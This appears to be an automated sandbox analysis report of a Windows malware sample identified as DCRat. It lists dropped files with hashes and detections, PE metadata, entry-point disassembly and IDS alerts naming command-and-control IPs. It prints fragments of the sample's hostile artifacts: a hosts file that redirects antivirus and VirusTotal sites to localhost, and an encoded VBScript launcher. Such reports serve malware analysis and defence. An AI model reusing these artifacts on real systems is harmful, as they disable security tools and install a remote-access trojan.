                  SSDEEP:6:h+RdcMcjyXRSS1PNIod4Wjf5SkUhANct2INUgGhD9B/iYKFoPGU2G6H:cbcyBhn5mqBWhXUbB/iYSouU2G6H
                  MD5:B40B317575C6D470651713489D9AFCEB
                  SHA1:D3C724ABAACAE3E330B660195792A82DBC7E715D
                  SHA-256:C8E97D3872D3DAA70775733B7A93BF642F0D32B60DFC3930755221F2FD7C6B1F
                  SHA-512:F5E55D6CB5CFE5DCA6161D6414CCA424BB9405327425DB6776E16118BBF54E6DBE1F97D0D93245F4952E8A0B4DFDDEA35D55323DECD6802EC0EEED47859C81D2
                  Malicious:false
                  Preview:oN1knsNm5DPu2Hhl5ZZvVWQGX3faQPPiiBo0wZV4YaegTNAKlYuCBT9R7uNuMxWqyqM1cryfEfX42twJ2Vy1eNgOBX3BMlrkExsnBIr4jO7g6EZO7D118eLkJ7zFyxTcxw0EAJHtn3SPPAS77oEIu0ljmIeETmGv5fsJNUNy6HOEM5UIo2HJtLs7KRb2pDaAxgUuRJtnaPMmmhXrxVZaf7Cuxv863VI3rNRpkk0fIesd9FVn4uETn9ezdk6gKxtFGT5YPrGNe4SBPjvsaVBIRzPrsbLAnUVVumWpK6YMn1ztrdk4zOGzvlyRDNqxfGjKi6RmMFid6zfa9fAP1QLZNfk
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (539), with no line terminators
                  Category:dropped
                  Size (bytes):539
                  Entropy (8bit):5.8625380102648466
                  Encrypted:false
                  SSDEEP:12:ugtr2l5C5YtgXWvodreoHid4heQuJI9gJ/BpGSRW8MCL83+wl9:Hhmv6Id4sTqMKSM8+3+wl9
                  MD5:6FCEE79D5D7D26256877F2893D73977D
                  SHA1:19F9EBE741C7FAB62D6C1736445558B5A8E93BD4
                  SHA-256:C24EEAFAC5287D459FA537B5F7763D4B83D84719CD8323D949382590B49FCDE7
                  SHA-512:9715C64C2059AEC5FABA28B7117E2FB124989FB0E54AFE0BB79DC1ADE38E1834A158285D7332B976C2C1B126FDADBA8F3E4E3F921908E3C601FCFAE6A765C08D
                  Malicious:false
                  Preview:RoKuL8stqm26GXRiNa6O5K6DWIxHdlNWH7IUUPD3ibtlmoCbxEtzocmHsHYDKlQEYgyIO7N7XDqdbVarFWUZ2XspVBmN19s7KoMGz4M00wckwIqWqq8yQ1MAyJwNU9FXUsSwJU2KKeiG5H2NVPhKB4qTcLRqI8f0qFPDz3NVyxowTFFrQi2Ec5VaC9U7CLCL8raz1yXbBLWNQ4AWFkZjGaXvtzB0jQSmvcxlpPzbLaDRiIKI981cwcEiUpGCxh2v2tbxGZq0v7YqXFMlo31lY0zTXPQAJwonhRZyqWBkRBryDYKOceX4qRXB3IZ0Iqr8TuIGqX5R1RTWJBP9FChoZu7P3X4h6LblUsfTPEhFjFCZ7A223avGICjjx2MTcXVpzsCaf6tBecFTriR3fCogaVcRJ6gX1OnLuXjP7bX6rtlq7P2OkTxatzPdPvQjaWJPy3iT9C5EoryquwT3DRwibMc5IFAMKxgVkV1EriPiYtvBAitcbXfIjlymamL3Cs30LdGY5PMfCNJrbb5jVhuxSYv8gPn
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with CRLF, LF line terminators
                  Category:dropped
                  Size (bytes):1031
                  Entropy (8bit):4.80866969175849
                  Encrypted:false
                  SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTtzpAvI:vDZhyoZWM9rU5fFcWpAvI
                  MD5:58F68BAB7FA47A2BFEBBCA07EA770F1A
                  SHA1:ACAE041F20A9D69A61B18B986AE599447F4A50BC
                  SHA-256:AFF68CCE8D6BB4C29C13D36453BF833175A2819CF2B6B3A55B0247700A1DF2F2
                  SHA-512:21DD3869BA16B04B6A216EA45F27C02326D84288FCF94730FAA64B8E2D23F8A76526059790AEFED294DD4375DC662272137BCA06030A8042EB76981FF7D8EBE9
                  Malicious:true
                  Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1 www.virustotal.com.127.0.0.1 www.360totalsecurity.com.127.0.0.1 virustotal.com.127.0.0.1 360totalsecurity.com.127.0.0.1 www.avast.ru.127.0.0.1 avast.ru.127.0.0.1 ww
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (664), with no line terminators
                  Category:dropped
                  Size (bytes):664
                  Entropy (8bit):5.892458135893502
                  Encrypted:false
                  SSDEEP:12:ljbCz2M7X4w+jl/J82TfugDLWR3dd3YsUQNvwFY/LfZ30JJjUQNhjSWFeITwL:G4TJrigWHrNvwS/LZPWFeCwL
                  MD5:468BBDBFAA21C1D3E568D42F7BF613C4
                  SHA1:F47A030EDACB5E1141A3E567E7B43254346EB9B0
                  SHA-256:B293A4ACD674EC935C598D3C0E648701A12F37B410E51105505695EB9A4650CD
                  SHA-512:89F5B043B9388DE4CE81E60D65AD793DBAE27F3CA3CE1307DA59007F59E1F11482E88845478C1BA915A2A8CBDFDAE14B88098C14D0FB1BF2C4DDD6B4E7ED0C60
                  Malicious:false
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):259
                  Entropy (8bit):5.8309821490188805
                  Encrypted:false
                  SSDEEP:6:BUVkuWp9nn4V4MH/M59d4ig1KVQ0QD/xs:GVTk9nn4V7a9dbjQjK
                  MD5:3472582D086618A9732F0349B7DEF6C5
                  SHA1:4814B4E3C8ABCEA31CEE4F929D924EECEF804F63
                  SHA-256:2779FB64107A0699301772365C61BE694C8B8E6372D23D649B7AD47BC62A1417
                  SHA-512:415ECCD34CB291CD63F78932C3E8C225C9528405932D9A8DC0E4014D4D010AF552730826B991557C8FE156BFE499775A2CF3CA6EF1C4CE3585D3F85E7DAABF0D
                  Malicious:false
                  Preview:lsn7Nxj6mlQBMKVRRuoiJfnDgBC0Rm1UfL6AHSQa36WQ5DtSzMJwmAGFEkbLvtp9u6gBNVK9eNoMJXIcStAFcFseE05g1FoKRWg8hsEeBKSYV36rc83BsjhpOB6WZnHYjd5x0J5jofDSwUJK4OE2Lnbry1ugvsFXC3y28I0SDTWNfO232vcKjPN6BO89ZZy6aqP3fRMvYvz2QOLk80nAP4yxq20uK03ofZwz99XliqwxZVpxCYAivxqg1cMmackh2LW
                  Process:C:\Users\user\Desktop\findme.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):37
                  Entropy (8bit):4.2629790410707376
                  Encrypted:false
                  SSDEEP:3:I5ALsHXqX4+oINH:Ie43qo+o6
                  MD5:2F75CB9C29AD8DC8DAB47B39673A8F09
                  SHA1:89B9602BCF66BEA31F020C426878ACC7AA922B44
                  SHA-256:A42BDF46C460B2E7BAA4EC022DBA0474A9A9A9EEF343AE824A533E1FF700417E
                  SHA-512:54E8C98FAFBEEB42AF261747AFCF763E17113EF5EE4E23501F6088DA93FD004C9DB28C1D41C7C9A3FE05211ABF9CD40ADA3DB993CBDD545CB88C32C77EB07812
                  Malicious:false
                  Preview:"C:\runtimebrokerHost\webnetdhcp.exe"
                  Process:C:\Users\user\Desktop\findme.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):223
                  Entropy (8bit):5.87738728811133
                  Encrypted:false
                  SSDEEP:6:GXkgwqK+NkLzWbHY08nZNDd3RL1wQJR8vz1TGR7bbnJJNA:GXkBMCzWLY04d3XBJ2vJKRvDJA
                  MD5:E63C96D58301C1F1E3DAE1378B1B0ECA
                  SHA1:186598FA4A820157A4C284450F13C567BB3CB90E
                  SHA-256:EE8722B767B0C57B52C64CDB9F7B4ECA2B3593FBCDE9C6106391A6B065195B2A
                  SHA-512:390D7A2404C0379FF64C26BC6E046E09D6AB420AADE79D7A1E8E2AADA032C81621F4AAA5FAAA1D3C4049799E3FCA91F08198E306D2B2E0A2A0947A50E7D345C8
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:#@~^xgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJD;.Yb:+(DKV+MCG/Dz!%Hx:aqm5o4$5)9.S;fVmTWtt}j.[R(lOEBP!S~6ls/.LkAAAA==^#~@.
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\findme.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.677048354051325
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  • Win32 Executable (generic) a (10002005/4) 49.97%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:findme.exe
                  File size:3'403'917 bytes
                  MD5:4fabffd3dfad2d1e11ae2317b40b6e4a
                  SHA1:df2ce294dc75060632bfb45add20e69ccc9396c1
                  SHA256:079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a
                  SHA512:bc6ab0e0286913472d6ca8cd19e95b4066d433fbb6247ed377e6ade995a74c201902c32463361e9d9746277fe8898d95b8a08114eedc027f062b38d4ea9550ed
                  SSDEEP:49152:ubA3jIe1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQb:ubQNuAD3vyQ9bLG7yglVv4vHUy
                  TLSH:43F5E0117E40CA11F0191633C2EF468557B0ED20AAA6E71B7EB93B6E19123D37C1DADB
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                  Icon Hash:1515d4d4442f2d2d
                  Entrypoint:0x41ec40
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                  Instruction
                  call 00007FBA60B5A2D9h
                  jmp 00007FBA60B59CEDh
                  cmp ecx, dword ptr [0043E668h]
                  jne 00007FBA60B59E65h
                  ret
                  jmp 00007FBA60B5A45Eh
                  int3
                  int3
                  int3
                  int3
                  int3
                  push ebp
                  mov ebp, esp
                  push esi
                  push dword ptr [ebp+08h]
                  mov esi, ecx
                  call 00007FBA60B4CBF7h
                  mov dword ptr [esi], 00435580h
                  mov eax, esi
                  pop esi
                  pop ebp
                  retn 0004h
                  and dword ptr [ecx+04h], 00000000h
                  mov eax, ecx
                  and dword ptr [ecx+08h], 00000000h
                  mov dword ptr [ecx+04h], 00435588h
                  mov dword ptr [ecx], 00435580h
                  ret
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  lea eax, dword ptr [ecx+04h]
                  mov dword ptr [ecx], 00435568h
                  push eax
                  call 00007FBA60B5CFFDh
                  pop ecx
                  ret
                  push ebp
                  mov ebp, esp
                  sub esp, 0Ch
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007FBA60B4CB8Eh
                  push 0043B704h
                  lea eax, dword ptr [ebp-0Ch]
                  push eax
                  call 00007FBA60B5C712h
                  int3
                  push ebp
                  mov ebp, esp
                  sub esp, 0Ch
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007FBA60B59E04h
                  push 0043B91Ch
                  lea eax, dword ptr [ebp-0Ch]
                  push eax
                  call 00007FBA60B5C6F5h
                  int3
                  jmp 00007FBA60B5E743h
                  jmp dword ptr [00433260h]
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push 00421EB0h
                  push dword ptr fs:[00000000h]
                  Programming Language:
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [C++] VS2015 UPD3.1 build 24215
                  • [EXP] VS2015 UPD3.1 build 24215
                  • [RES] VS2015 UPD3 build 24213
                  • [LNK] VS2015 UPD3.1 build 24215
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0xdf98 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x2268 | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x310ea | 0x31200 | c5bf61bbedb6ad471e9dc6266398e965 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata | 0x33000 | 0xa612 | 0xa800 | 7980b588d5b28128a2f3c36cabe2ce98 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0x3e000 | 0x23728 | 0x1000 | 201530c9e56f172adf2473053298d48f | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .didat | 0x62000 | 0x188 | 0x200 | c5d41d8f254f69e567595ab94266cfdc | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0x63000 | 0xdf98 | 0xe000 | d4fc32bf886ae704fea4f916f9d3a59d | False | 0.637451171875 | data | 6.661378204564432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc | 0x71000 | 0x2268 | 0x2400 | c7a942b723cb29d9c02f7c611b544b50 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  PNG | 0x63644 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                  PNG | 0x6418c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                  RT_ICON | 0x65738 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                  RT_ICON | 0x65ca0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                  RT_ICON | 0x66548 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                  RT_ICON | 0x673f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                  RT_ICON | 0x67858 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                  RT_ICON | 0x68900 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                  RT_ICON | 0x6aea8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                  RT_DIALOG | 0x6ec1c | 0x286 | data | English | United States | 0.5092879256965944
                  RT_DIALOG | 0x6eea4 | 0x13a | data | English | United States | 0.60828025477707
                  RT_DIALOG | 0x6efe0 | 0xec | data | English | United States | 0.6991525423728814
                  RT_DIALOG | 0x6f0cc | 0x12e | data | English | United States | 0.5927152317880795
                  RT_DIALOG | 0x6f1fc | 0x338 | data | English | United States | 0.45145631067961167
                  RT_DIALOG | 0x6f534 | 0x252 | data | English | United States | 0.5757575757575758
                  RT_STRING | 0x6f788 | 0x1e2 | data | English | United States | 0.3900414937759336
                  RT_STRING | 0x6f96c | 0x1cc | data | English | United States | 0.4282608695652174
                  RT_STRING | 0x6fb38 | 0x1b8 | data | English | United States | 0.45681818181818185
                  RT_STRING | 0x6fcf0 | 0x146 | data | English | United States | 0.5153374233128835
                  RT_STRING | 0x6fe38 | 0x446 | data | English | United States | 0.340036563071298
                  RT_STRING | 0x70280 | 0x166 | data | English | United States | 0.49162011173184356
                  RT_STRING | 0x703e8 | 0x152 | data | English | United States | 0.5059171597633136
                  RT_STRING | 0x7053c | 0x10a | data | English | United States | 0.49624060150375937
                  RT_STRING | 0x70648 | 0xbc | data | English | United States | 0.6329787234042553
                  RT_STRING | 0x70704 | 0xd6 | data | English | United States | 0.5747663551401869
                  RT_GROUP_ICON | 0x707dc | 0x68 | data | English | United States | 0.7019230769230769
                  RT_MANIFEST | 0x70844 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.39786666666666665
                  DLL | Import
                  KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                  gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                  Language of compilation system | Country where language is spoken | Map
                  English | United States |
                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                  2025-01-13T12:50:08.371679+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49699 | 208.95.112.1 | 80 | TCP
                  2025-01-13T12:50:09.840414+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49700 | 208.95.112.1 | 80 | TCP
                  2025-01-13T12:50:56.209417+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.7 | 52544 | 37.44.238.250 | 80 | TCP
                  2025-01-13T12:50:56.723717+0100 | 2850862 | ETPRO MALWARE DCRat Initial Checkin Server Response M4 | 1 | 37.44.238.250 | 80 | 192.168.2.7 | 52544 | TCP
